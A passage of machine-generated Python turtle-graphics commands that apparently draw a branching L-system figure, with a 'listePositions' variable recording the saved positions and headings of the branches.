pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,210.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((67.35,210.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,210.60)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((78.67,221.92), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.67,221.92)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,179.82), 67.5), ((78.67,221.92), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.67,221.92)), setheading(45.0) ;
pu(), setposition((61.23,179.82)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((72.54,191.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((72.54,191.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((72.54,191.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((72.54,191.13)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,202.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,202.45)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((99.86,202.45), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.86,202.45)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((99.86,202.45), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.86,202.45)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((114.64,208.57), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.64,208.57)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((114.64,208.57), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.64,208.57)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((125.95,219.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.95,219.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 22.5), ((125.95,219.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.95,219.88)), setheading(45.0) ;
pu(), setposition((83.86,202.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((89.98,217.23), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.98,217.23)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((89.98,217.23), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.98,217.23)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((101.29,228.54), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,228.54)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((101.29,228.54), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,228.54)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((116.08,234.67), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,234.67)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((116.08,234.67), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,234.67)), setheading(22.5) ;
pu(), setposition((83.86,202.45)), setheading(45.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(22.5) ;
pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(0.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((93.33,136.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,136.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((93.33,136.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,136.63)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.11,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.11,142.75)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((138.89,136.63), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.89,136.63)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((138.89,136.63), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.89,136.63)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,142.75)), setheading(22.5) ;
pu(), setposition((108.11,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((134.21,160.18), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.21,160.18)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((134.21,160.18), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.21,160.18)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((150.21,160.18), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.21,160.18)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((150.21,160.18), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.21,160.18)), setheading(0.0) ;
pu(), setposition((108.11,142.75)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(337.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.68,130.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.68,130.50)), setheading(337.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((143.80,115.72), 270.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.80,115.72)), setheading(270.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((143.80,115.72), 292.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.80,115.72)), setheading(292.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((155.11,104.41), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.11,104.41)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((155.11,104.41), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.11,104.41)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((169.89,98.28), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.89,98.28)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((169.89,98.28), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.89,98.28)), setheading(337.5) ;
pu(), setposition((137.68,130.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((153.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((153.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((168.46,124.38), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.46,124.38)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((168.46,124.38), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.46,124.38)), setheading(337.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((179.77,113.07), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((179.77,113.07)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((179.77,113.07), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((179.77,113.07)), setheading(315.0) ;
pu(), setposition((137.68,130.50)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.68,130.50)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((180.99,119.19), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.99,119.19)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((180.99,119.19), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.99,119.19)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((195.77,113.07), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.77,113.07)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((195.77,113.07), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.77,113.07)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((211.77,113.07), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.77,113.07)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((211.77,113.07), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.77,113.07)), setheading(0.0) ;
pu(), setposition((169.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((184.46,136.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(0.0) ;
left(22.5) ;
